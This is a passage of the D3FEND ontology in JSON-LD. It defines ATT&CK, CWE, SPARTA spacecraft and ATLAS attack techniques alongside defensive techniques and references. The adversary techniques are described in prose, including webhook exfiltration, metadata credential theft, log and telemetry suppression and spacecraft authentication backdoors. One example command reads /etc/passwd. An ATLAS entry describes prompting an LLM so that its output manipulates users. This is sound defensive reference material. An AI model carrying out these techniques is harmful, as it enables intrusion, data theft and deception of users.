      "d3f:definition": "Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application.",
      "rdfs:label": "Exfiltration Over Webhook",
      "rdfs:subClassOf": {
        "@id": "d3f:T1567"
      }
    },
    {
      "@id": "d3f:T1552.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:CloudInstanceMetadata"
      },
      "d3f:attack-id": "T1552.005",
      "d3f:definition": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.",
      "rdfs:label": "Cloud Instance Metadata API",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1552"
        },
        {
          "@id": "_:N62e708ff004c4be9944e03d9350cba9c"
        }
      ]
    },
    {
      "@id": "_:N62e708ff004c4be9944e03d9350cba9c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudInstanceMetadata"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-6_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Timely Maintenance | Preventive Maintenance",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "MA-6(1)"
    },
    {
      "@id": "d3f:InputDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving human-machine interface devices, such as keyboards, mice, or touchscreens.",
      "rdfs:label": "Input Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:N323a361ca61b4aa69632d8fe1cd23e9e"
        }
      ]
    },
    {
      "@id": "_:N323a361ca61b4aa69632d8fe1cd23e9e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InputDevice"
      }
    },
    {
      "@id": "d3f:T1036.011",
      "@type": "owl:Class",
      "d3f:attack-id": "T1036.011",
      "d3f:definition": "Adversaries may modify a process's in-memory arguments to change its name in order to appear as a legitimate or benign process. On Linux, the operating system stores command-line arguments in the process’s stack and passes them to the `main()` function as the `argv` array. The first element, `argv[0]`, typically contains the process name or path - by default, the command used to actually start the process (e.g., `cat /etc/passwd`). By default, the Linux `/proc` filesystem uses this value to represent the process name. The `/proc/<PID>/cmdline` file reflects the contents of this memory, and tools like `ps` use it to display process information. Since arguments are stored in user-space memory at launch, this modification can be performed without elevated privileges.",
      "rdfs:label": "Overwrite Process Arguments",
      "rdfs:subClassOf": {
        "@id": "d3f:T1036"
      }
    },
    {
      "@id": "d3f:CWE-221",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-221",
      "d3f:definition": "The product does not record, or improperly records, security-relevant information that leads to an incorrect decision or hampers later analysis.",
      "rdfs:label": "Information Loss or Omission",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CWE-271",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-271",
      "d3f:definition": "The product does not drop privileges before passing control of a resource to an actor that does not have those privileges.",
      "rdfs:label": "Privilege Dropping / Lowering Errors",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-269"
      }
    },
    {
      "@id": "d3f:KernelProcessTable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A data structure in the kernel which is a table containing all of the information that must be saved when the CPU switches from running one process to another in a multitasking system. It allows the operating system to track the execution status of every process. For every process managed by the kernel, there is a process control block (PCB) in the process table.",
      "rdfs:isDefinedBy": {
        "@id": "https://encyclopedia2.thefreedictionary.com/process+table"
      },
      "rdfs:label": "Kernel Process Table",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Process_(computing)"
        },
        {
          "@id": "https://www.geeksforgeeks.org/process-table-and-process-control-block-pcb/"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:T1070.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1070.003",
      "d3f:definition": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.",
      "d3f:modifies": {
        "@id": "d3f:CommandHistoryLog"
      },
      "rdfs:label": "Clear Command History",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1070"
        },
        {
          "@id": "_:N2d12395fb9ed4b7ba9676d081bebbece"
        }
      ]
    },
    {
      "@id": "_:N2d12395fb9ed4b7ba9676d081bebbece",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CommandHistoryLog"
      }
    },
    {
      "@id": "d3f:IA-0007.02",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0007.02",
      "d3f:definition": "Adversaries may use a compromised, mission-owned ground system to transmit legitimate-looking commands to the target spacecraft. Because the ground equipment is already configured for the mission, correct waveforms, framing, dictionaries, and scheduling, the attacker’s traffic blends with routine operations. Initial access unfolds by inserting commands or procedures into existing timelines, modifying rate/size limits or command queues, or invoking maintenance dictionaries and rapid-response workflows that accept broader command sets. Pre-positioned scripts can chain actions across multiple passes and stations, while telemetry routing provides immediate feedback to refine follow-on steps. Exfiltration can be embedded in standard downlink channels or forwarded through gateways as ordinary mission data. The distinguishing feature is that command origin appears valid, transmitted from approved apertures using expected parameters, so the first execution event is not a protocol anomaly but a misuse of legitimate command authority obtained through the compromised ground system.",
      "rdfs:label": "Malicious Commanding via Valid GS - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0007/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0007"
      },
      "skos:prefLabel": "Malicious Commanding via Valid GS"
    },
    {
      "@id": "d3f:Reference-GatheringEvidenceModel-DrivenSoftwareEngineeringinAutomatedDigitalForensics",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://pure.uva.nl/ws/files/1739225/132135_thesis.pdf"
      },
      "d3f:kb-author": "van den Bos, J.",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:FileContentDecompressionChecking"
        },
        {
          "@id": "d3f:FileInternalStructureVerification"
        },
        {
          "@id": "d3f:FileMagicByteVerification"
        },
        {
          "@id": "d3f:FileMetadataConsistencyValidation"
        }
      ],
      "d3f:kb-reference-title": "Gathering Evidence: Model-Driven Software Engineering in Automated Digital Forensics",
      "rdfs:label": "Reference - Gathering Evidence: Model-Driven Software Engineering in Automated Digital Forensics"
    },
    {
      "@id": "d3f:Clustering",
      "@type": "owl:Class",
      "rdfs:label": "Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:Summarizing"
      }
    },
    {
      "@id": "d3f:SPARTAPersistenceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0005"
      },
      "rdfs:label": "Persistence Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:N2841bacad5dc4dfd8fe150ea8d2e04d0"
        }
      ],
      "skos:prefLabel": "Persistence Technique"
    },
    {
      "@id": "_:N2841bacad5dc4dfd8fe150ea8d2e04d0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0005"
      }
    },
    {
      "@id": "d3f:CWE-327",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-327",
      "d3f:definition": "The product uses a broken or risky cryptographic algorithm or protocol.",
      "rdfs:label": "Use of a Broken or Risky Cryptographic Algorithm",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:DE-0002.03",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0002.03",
      "d3f:definition": "In this variant, telemetry is suppressed at the source by manipulating on-board generation or transmission. Methods include disabling or pausing telemetry publishers, altering packet filters and rates, muting event/report channels, reconfiguring recorder playback, retuning/muting transmitters, or switching to modes that emit only minimal beacons. The spacecraft continues operating, but the downlink no longer reflects true activity or arrives too sparsely to support monitoring. By constraining what is produced or transmitted, the adversary reduces opportunities for detection while other actions proceed.",
      "rdfs:label": "Inhibit Spacecraft Functionality - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0002/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0002"
      },
      "skos:prefLabel": "Inhibit Spacecraft Functionality"
    },
    {
      "@id": "d3f:ProcessSegment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Process segments are distinct partitions of the memory space of a running process.  Heap, data, code, and stack segments are examples of process segments.",
      "d3f:synonym": "Process Memory",
      "rdfs:label": "Process Segment",
      "rdfs:subClassOf": {
        "@id": "d3f:BinarySegment"
      }
    },
    {
      "@id": "d3f:EX-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0003",
      "d3f:definition": "The adversary alters how the spacecraft validates authority so that future inputs are accepted on their terms. Modifications can target code (patching flight binaries, hot-patching functions in memory, hooking command handlers), data (changing key identifiers, policy tables, or counter initialization), or control flow (short-circuiting MAC checks, widening anti-replay windows, bypassing interlocks on specific opcodes). Common choke points include telecommand verification routines, bootloader or update verifiers, gateway processors that bridge payload and bus traffic, and maintenance dictionaries invoked in special modes. Subtle variants preserve outward behavior, producing normal-looking acknowledgments and counters, while internally accepting a broader set of origins, opcodes, or timetags. Others introduce conditional logic so the backdoor only activates under specific geometry or timing, masking during routine audit. Once resident, the modified process becomes the new trust oracle, enabling recurring execution for the attacker and, in some cases, denying legitimate control by causing authentic inputs to fail verification or to be deprioritized.",
      "rdfs:label": "Modify Authentication Process - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Modify Authentication Process"
    },
    {
      "@id": "d3f:T1010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1010",
      "d3f:definition": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)",
      "d3f:may-invoke": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:GetOpenWindows"
        }
      ],
      "rdfs:label": "Application Window Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:Nb7d628cc501245b1b4327cdc2e7e6dd6"
        },
        {
          "@id": "_:N7dd23a1d822f4f54a421a3bd1d6b13ac"
        }
      ]
    },
    {
      "@id": "_:Nb7d628cc501245b1b4327cdc2e7e6dd6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N7dd23a1d822f4f54a421a3bd1d6b13ac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetOpenWindows"
      }
    },
    {
      "@id": "d3f:T1522",
      "@type": "owl:Class",
      "d3f:attack-id": "T1522",
      "d3f:definition": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1552.005",
      "rdfs:label": "Cloud Instance Metadata API",
      "rdfs:seeAlso": {
        "@id": "d3f:T1552.005"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:CWE-334",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-334",
      "d3f:definition": "The number of possible random values is smaller than needed by the product, making it more susceptible to brute force attacks.",
      "rdfs:label": "Small Space of Random Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:CWE-304",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-304",
      "d3f:definition": "The product implements an authentication technique, but it skips a step that weakens the technique.",
      "rdfs:label": "Missing Critical Step in Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-303"
        },
        {
          "@id": "d3f:CWE-573"
        }
      ]
    },
    {
      "@id": "d3f:unmounts",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x unmounts y: An operation x removes the access via computer system's file system the availability of files and directories on storage artifact y.  Unmounts reverse or undo prior mount operations.",
      "rdfs:label": "unmounts",
      "rdfs:seeAlso": {
        "@id": "dbr:Mount_(computing)"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:OperationalProcessMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperationalProcessMonitoring"
      ],
      "d3f:d3fend-id": "D3-OPM",
      "d3f:definition": "Monitoring physical parameters and operator actions related to an operational environment.",
      "d3f:kb-article": "## How it works\n\nWhile some Operational Technology systems are designed to operate without human intervention, most systems are designed with the ability to monitor and modify the physical process with user input.\n\nThis technique detects adversarial risks to operational processes by observing physical events and operator actions and analyzing event logs.\n\nKey steps in operational process security monitoring are:\n\n1. Read logs generated by controllers, and HMIs, through DAU's and DA agents;\n\n2. Produce digital event records;\n\n3. Display the aggregated data to a device such as an HMI or process historian, and write those records to event logs and/or to the OT process data historian for traceability and incident reconstruction.\n\n4. Monitor the procees and detect incidents or indicators of tampering such as:\n- malfunctions\n- unauthorized commands,\n- unsafe setpoint changes,\n- alarm suppression, and\n- anomalous mode transitions;\n\n",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-GuideToOTSecurity"
      },
      "d3f:monitors": {
        "@id": "d3f:EventLog"
      },
      "d3f:synonym": "Supervisory Control Monitoring",
      "d3f:uses": {
        "@id": "d3f:OTProcessDataHistorian"
      },
      "rdfs:label": "Operational Process Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N0dc56235800a4b3fb37f56f479fb163c"
        },
        {
          "@id": "_:Nc6acacd5db0045ceaf4c83b385ca3ecb"
        }
      ]
    },
    {
      "@id": "_:N0dc56235800a4b3fb37f56f479fb163c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "_:Nc6acacd5db0045ceaf4c83b385ca3ecb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProcessDataHistorian"
      }
    },
    {
      "@id": "d3f:IdentifierAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IdentifierAnalysis"
      ],
      "d3f:d3fend-id": "D3-ID",
      "d3f:definition": "Analyzing identifier artifacts such as IP address, domain names, or URL(I)s.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "rdfs:label": "Identifier Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Nab552aca4c4c407387b94225c2488a7a"
        }
      ]
    },
    {
      "@id": "_:Nab552aca4c4c407387b94225c2488a7a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:ContainerRuntime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software layer between a container process and a kernel which often mediates the invocation of a system call.",
      "d3f:runs": {
        "@id": "d3f:ContainerImage"
      },
      "rdfs:label": "Container Runtime",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ContainerProcess"
        },
        {
          "@id": "d3f:Kernel"
        },
        {
          "@id": "d3f:SystemCall"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N6dc3673f033e4a929cb38cbe58262937"
        }
      ]
    },
    {
      "@id": "_:N6dc3673f033e4a929cb38cbe58262937",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ContainerImage"
      }
    },
    {
      "@id": "d3f:AML.T0088",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0088",
      "d3f:definition": "Adversaries may use generative artificial intelligence (GenAI) to create synthetic media (i.e. imagery, video, audio, and text) that appear authentic. These \"[deepfakes]( https://en.wikipedia.org/wiki/Deepfake)\" may mimic a real person or depict fictional personas. Adversaries may use deepfakes for impersonation to conduct [Phishing](/techniques/AML.T0052) or to evade AI applications such as biometric identity verification systems (see [Evade AI Model](/techniques/AML.T0015)).\n\nManipulation of media has been possible for a long time, however GenAI reduces the skill and level of effort required, allowing adversaries to rapidly scale operations to target more users or systems. It also makes real-time manipulations feasible.\n\nAdversaries may utilize open-source models and software that were designed for legitimate use cases to generate deepfakes for malicious use. However, there are some projects specifically tailored towards malicious use cases such as [ProKYC](https://www.catonetworks.com/blog/prokyc-selling-deepfake-tool-for-account-fraud-attacks/).",
      "rdfs:label": "Generate Deepfakes - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0088"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIAttackStagingTechnique"
      },
      "skos:prefLabel": "Generate Deepfakes"
    },
    {
      "@id": "d3f:T1187",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1187",
      "d3f:definition": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.",
      "d3f:may-modify": {
        "@id": "d3f:WindowsShortcutFile"
      },
      "d3f:modifies": {
        "@id": "d3f:AuthenticationLog"
      },
      "d3f:produces": {
        "@id": "d3f:Authentication"
      },
      "rdfs:label": "Forced Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:Nfa893e7813704b94902f0d859d7291e9"
        },
        {
          "@id": "_:N1dfc908fe850441d87d50770efff09ef"
        },
        {
          "@id": "_:N547b635ed8314da996fbc1610f5c3b29"
        }
      ]
    },
    {
      "@id": "_:Nfa893e7813704b94902f0d859d7291e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsShortcutFile"
      }
    },
    {
      "@id": "_:N1dfc908fe850441d87d50770efff09ef",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationLog"
      }
    },
    {
      "@id": "_:N547b635ed8314da996fbc1610f5c3b29",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:SeqGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SEQ",
      "d3f:definition": "Sequence Generation Framework (SeqGAN) models the data generator as a stochastic policy in reinforcement learning (RL), SeqGAN bypasses the generator differentiation problem by directly performing gradient policy update.",
      "d3f:kb-article": "## References\nYu, L., Zhang, W., Wang, J., & Yu, Y. (2017). SeqGAN: Sequence Generative Adversarial Nets with Policy Gradient. ArXiv preprint ArXiv:1609.05473. [Link](https://arxiv.org/abs/1609.05473)",
      "d3f:synonym": "Sequence GAN",
      "rdfs:label": "SeqGAN",
      "rdfs:subClassOf": {
        "@id": "d3f:GenerativeAdversarialNetwork"
      }
    },
    {
      "@id": "d3f:CCI-001210_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, at organization-defined information system components, loads and executes the operating environment from hardware-enforced, read-only media.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DriverLoadIntegrityChecking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001210"
    },
    {
      "@id": "d3f:Reference-IntegrityAssuranceThroughEarlyLoadingInTheBootPhase_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170061127A1"
      },
      "d3f:kb-abstract": "Techniques utilizing library and pre-boot components to ensure that a driver associated with a kernel-mode component is initialized before other drivers during a boot phase are described herein. The library component is processed during a boot phase; the pre-boot component, which may be an alternative to the library component, is processed during a pre-boot phase. By ensuring that the driver is the first driver initialized, the components enable the driver to launch the kernel-mode component before other drivers are initialized. The library component may also determine whether another driver is to be initialized before the kernel-mode component driver, may ensure that kernel-mode component driver is initialized first, and may alert the kernel-mode component. Also, the library component may retrieve information that is to be deleted by the operating system before initialization of drivers and may provide that information to the kernel-mode component.",
      "d3f:kb-author": "Ion-Alexandru Ionescu",
      "d3f:kb-mitre-analysis": "To compromise software or to gain control of a host device, a security exploit can modify driver initialization order used by an operating system and place a driver associated with the security exploit first in a list of drivers initialized by the operating system.\n\nThis patent describes ensuring that a driver associated with the agent is initialized first. To ensure the driver is initialized first, a dependent DLL associated with the driver is configured to be processed before other dependent DLLs. The dependent DLL can be configured to be processed first by various methods, for example if processing is done in alphabetical order, changing its name to be processed first. The dependent DLL, once processed, executes a number of operations to ensure the driver associated with the agent is initialized first. Furthermore, if the initialization order is modified, an alert is provided to the kernel-mode component that notifies the kernel-mode component it was not first and the order had to be altered. It can then take additional actions such as additional monitoring or remediation.",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DriverLoadIntegrityChecking"
      },
      "d3f:kb-reference-title": "Integrity assurance through early loading in the boot phase",
      "rdfs:label": "Reference - Integrity assurance through early loading in the boot phase - Crowdstrike Inc"
    },
    {
      "@id": "d3f:AML.T0067",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0067",
      "d3f:definition": "Adversaries may utilize prompts to a large language model (LLM) which manipulate various components of its response in order to make it appear trustworthy to the user. This helps the adversary continue to operate in the victim's environment and evade detection by the users it interacts with.\n\nThe LLM may be instructed to tailor its language to appear more trustworthy to the user or attempt to manipulate the user to take certain actions. Other response components that could be manipulated include links, recommended follow-up actions, retrieved document metadata, and [Citations](/techniques/AML.T0067.000).",
      "rdfs:label": "LLM Trusted Output Components Manipulation - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0067"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "LLM Trusted Output Components Manipulation"
    },
    {
      "@id": "d3f:ST0009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to manipulate, interrupt, or destroy the space system(s) and/or data.",
      "d3f:display-order": 9,
      "rdfs:label": "Impact - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0009"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Impact"
    },
    {
      "@id": "d3f:CWE-354",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-354",
      "d3f:definition": "The product does not validate or incorrectly validates the integrity check values or \"checksums\" of a message. This may prevent it from detecting if the data has been modified or corrupted in transmission.",
      "rdfs:label": "Improper Validation of Integrity Check Value",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-345"
        },
        {
          "@id": "d3f:CWE-754"
        }
      ]
    },
    {
      "@id": "d3f:T1562.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1562.006",
      "d3f:definition": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).",
      "rdfs:label": "Indicator Blocking",
      "rdfs:subClassOf": {
        "@id": "d3f:T1562"
      }
    },
    {
      "@id": "d3f:T1655.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1655.001",
      "d3f:definition": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by giving artifacts the name and icon of a legitimate, trusted application (i.e., Settings), or using a package name that matches legitimate, trusted applications (i.e., `com.google.android.gm`).",
      "rdfs:label": "Match Legitimate Name or Location - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1655"
      },
      "skos:prefLabel": "Match Legitimate Name or Location"
    },
    {
      "@id": "d3f:T1209",
      "@type": "owl:Class",
      "d3f:attack-id": "T1209",
      "d3f:definition": "The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.003",
      "rdfs:label": "Time Providers",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:version",
      "@type": [
        "owl:DatatypeProperty",
        "owl:FunctionalProperty"
      ],
      "d3f:definition": "x version y: The product or service x has the version y.",
      "rdfs:label": {
        "@language": "en",
        "@value": "version"
      },
      "rdfs:range": {
        "@id": "_:N20ccee7210a645aa83b52a2ae5a0bf39"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:d3fend-catalog-data-property"
        },
        {
          "@id": "d3f:d3fend-external-control-data-property"
        }
      ]
    },
    {
      "@id": "_:N20ccee7210a645aa83b52a2ae5a0bf39",
      "@type": "rdfs:Datatype",
      "owl:unionOf": {
        "@list": [
          {
            "@id": "xsd:integer"
          },
          {
            "@id": "xsd:string"
          }
        ]
      }
    },
    {
      "@id": "d3f:EXF-0006.01",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EXF-0006.01",
      "d3f:definition": "Programmable SDRs let an attacker introduce new waveforms or piggyback payloads into existing ones. By modifying DSP chains (filters, mixers, FEC, framing), the actor can: add a low-rate subcarrier under the main modulation, alter preamble/pilot sequences to encode bits, vary puncturing/interleaver patterns as a covert channel, or schedule brief “maintenance” bursts that actually carry exfiltrated data. Changes may be packaged as legitimate updates or configuration profiles so the SDR transmits toward attacker-visible geometry using standard equipment, while mission tooling interprets the emission as routine.",
      "d3f:may-modify": [
        {
          "@id": "d3f:Software-definedRadioConfiguration"
        },
        {
          "@id": "d3f:Software-definedRadioWaveformApplication"
        }
      ],
      "d3f:modifies": {
        "@id": "d3f:Software-definedRadio"
      },
      "rdfs:label": "Software Defined Radio - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0006/01/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EXF-0006"
        },
        {
          "@id": "_:Nf8c81a0f27a84b8a9073550071b05387"
        },
        {
          "@id": "_:N98ed6fb8ac5c4aaa8ee716a8b91026fe"
        },
        {
          "@id": "_:N75a85ca256734875a48c491dbfdb150a"
        }
      ],
      "skos:prefLabel": "Software Defined Radio"
    },
    {
      "@id": "_:Nf8c81a0f27a84b8a9073550071b05387",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioConfiguration"
      }
    },
    {
      "@id": "_:N98ed6fb8ac5c4aaa8ee716a8b91026fe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioWaveformApplication"
      }
    },
    {
      "@id": "_:N75a85ca256734875a48c491dbfdb150a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadio"
      }
    },
    {
      "@id": "d3f:CyberTechnique",
      "@type": "owl:Class",
